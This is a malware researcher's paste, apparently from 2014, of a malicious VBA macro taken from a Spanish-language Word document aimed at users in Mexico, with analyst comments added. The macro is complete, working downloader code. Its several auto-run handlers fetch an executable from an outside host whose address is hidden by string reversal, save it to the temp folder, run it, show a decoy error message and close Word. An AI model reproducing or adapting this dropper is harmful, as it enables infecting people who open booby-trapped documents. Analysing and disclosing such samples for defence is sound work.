
Untitled

dynamoo Jul 17th, 2014 629 Never
  1. Malicious macro from Spanish-language Word document targeting users in Mexico
  2. See http://blog.dynamoo.com/2014/07/notificacion-de-transferencia-de-fondos.html
  3.  
  4. -----------8x- CUT HERE --------------------------------
  5.  
  6. Attribute VB_Name = "ThisDocument"
      ' Analyst note: these Attribute lines are the header of an exported VBA module, not executable logic.
      ' VB_Name "ThisDocument" together with VB_Base "1Normal.ThisDocument" indicates the code sits in the
      ' document object module of a Word document, which is where the Document_Open event handler below lives.
  7. Attribute VB_Base = "1Normal.ThisDocument"
  8. Attribute VB_GlobalNameSpace = False
  9. Attribute VB_Creatable = False
  10. Attribute VB_PredeclaredId = True
  11. Attribute VB_Exposed = True
  12. Attribute VB_TemplateDerived = True
  13. Attribute VB_Customizable = True
  14. Private Sub Auto_Open()
      ' Analyst note: auto-run entry point. "Auto_Open" is the Excel-style auto-macro name; in a Word
      ' ThisDocument module it presumably does not fire on its own (verify against the host application).
      ' StrReverse() hides the URL from plain string matching; the literal reversed is
      ' hxxp://piap[.]cl/cra/wp/ss.exe (defanged). The second argument is the name the file is saved under.
  15. Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "4b646n46.exe")
  16. End Sub
  17. Private Sub Workbook_Open()
      ' Analyst note: auto-run entry point using the Excel workbook-open event name. Only the saved file
      ' name differs from the other entry points in this module; the reversed URL literal is the same and
      ' decodes to hxxp://piap[.]cl/cra/wp/ss.exe (defanged).
  18. Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "rsd54tgs.exe")
  19. End Sub
  20. Private Sub AutoExec()
      ' Analyst note: auto-run entry point using Word's "AutoExec" auto-macro name (associated with Word
      ' start-up / global template load). Passes the same reversed URL literal, which decodes to
      ' hxxp://piap[.]cl/cra/wp/ss.exe (defanged), with a different saved file name.
  21. Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "ds8fydsa89f7.exe")
  22. End Sub
  23. Private Sub AutoOpen()
      ' Analyst note: auto-run entry point using Word's "AutoOpen" auto-macro name (document open).
      ' Passes the same reversed URL literal, which decodes to hxxp://piap[.]cl/cra/wp/ss.exe (defanged),
      ' with a different saved file name.
  24. Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "fsfsfsdsd.exe")
  25. End Sub
  26. Private Sub Document_Open()
      ' Analyst note: Word's Document_Open event handler; in a ThisDocument module this is the handler
      ' Word invokes when the document is opened with macros enabled. Passes the same reversed URL literal,
      ' which decodes to hxxp://piap[.]cl/cra/wp/ss.exe (defanged), with a different saved file name.
  27. Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "hjhhjhjhjhj.exe")
  28. End Sub
  29. Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)
          ' Analyst summary: downloader/dropper routine. It requests URL over HTTP, writes the response body
          ' to Environ(SavePath) & "\" & SaveName, starts the written file with Shell, shows an error dialog,
          ' and then quits the host application.
          '
          ' Parameters:
          '   URL       - address to fetch (the callers in this module pass a StrReverse()-obfuscated literal).
          '   SaveName  - file name used for the written file.
          '   SavePath  - the NAME of an environment variable (default "TMP"), resolved with Environ();
          '               it is not a directory path.
          '   RunAfterDownload, RunHide - declared but never read in this body: the file is always started,
          '               and always with vbNormalFocus.
          ' Return value: set to True unconditionally after the Shell call; it does not reflect success.
          '
          ' Detection/mitigation note: the observable chain is an Office process creating Microsoft.XMLHTTP
          ' and ADODB.Stream objects, writing an .exe under the temp directory, and spawning it as a child
          ' process. Blocking macros in documents from the internet, or preventing Office applications from
          ' creating child processes, interrupts this chain.
  30.     On Error Resume Next
          ' Every runtime error below (request, write, launch) is skipped silently, so the dialog and the
          ' quit sequence still run even when the download fails.
  31.     Err.Clear
  32.  
          ' Late-bound COM objects: an HTTP client and a binary stream used to write the response to disk.
  33.     Set XML = CreateObject("Microsoft.XMLHTTP")
  34.     Set ADS = CreateObject("ADODB.Stream")
  35.  
          ' Third argument False makes the request synchronous: send blocks until the response arrives.
  36.     XML.Open "GET", URL, False
  37.     XML.send
  38.  
          ' The header string is requested but the result is discarded; no status code is checked anywhere.
  39.     XML.getAllResponseHeaders
  40.  
          ' With the default SavePath this resolves to the TMP environment variable's directory plus SaveName.
  41.     FullSavePath = Environ(SavePath) & "\" & SaveName
  42.  
          ' Type 1 is adTypeBinary; SaveToFile option 2 is adSaveCreateOverWrite, so an existing file of the
          ' same name is replaced.
  43.     ADS.Open
  44.     ADS.Type = 1
  45.     ADS.Write XML.responseBody
  46.     ADS.SaveToFile FullSavePath, 2
  47.  
          ' Runs the file that was just written. The stream is never closed explicitly in this body.
  48.     Shell FullSavePath, vbNormalFocus
  49.     DownloadFile = True
          ' The Spanish text reads: "This document is not compatible with this computer. Please try from
          ' another computer." It is shown as a critical "Error" dialog after the payload has been started,
          ' so it appears to serve as a decoy explaining why no document content is displayed.
  50.     MsgBox "Este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Error"
          ' The loop condition 1 = 1 is always true and there is no Exit: z counts 0, 1, 2 and on the third
          ' pass alerts are turned off and Application.Quit is called, presumably so the host closes without
          ' a save prompt. The loop only ends when the application terminates.
  51.     Dim z
  52.     z = 0
  53.     Do While 1 = 1
  54.     If z = 2 Then
  55.     Application.DisplayAlerts = False
  56.     Application.Quit
  57.     End If
  58.     z = z + 1
  59.     Loop
  60. End Function